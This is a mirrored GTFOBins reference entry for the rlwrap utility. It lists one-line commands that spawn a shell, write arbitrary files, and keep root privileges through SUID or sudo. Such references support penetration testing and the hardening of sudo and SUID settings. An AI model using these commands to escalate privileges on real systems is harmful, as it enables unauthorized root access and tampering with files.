This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-31 08:48:54 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
d4b50275bb026af2205e8db0db4ddfc990db90cf
GTFOBins.github.io
/
_gtfobins
/
rlwrap.md
Andrea Cardaci
d4b50275bb
Use DATA as a placeholder for file-write operations
2018-08-20 15:00:34 +02:00
375 B
Raw
Blame
History
functions
functions
execute-interactive
file-write
suid-enabled
sudo-enabled
code
rlwrap /bin/sh
description
code
This adds timestamps to the output file. This relies on the external `echo` command.
LFILE=file_to_write rlwrap -l "$LFILE" echo DATA
code
./rlwrap -H /dev/null /bin/sh -p
code
sudo rlwrap /bin/sh
Reference in New Issue
View Git Blame
Copy Permalink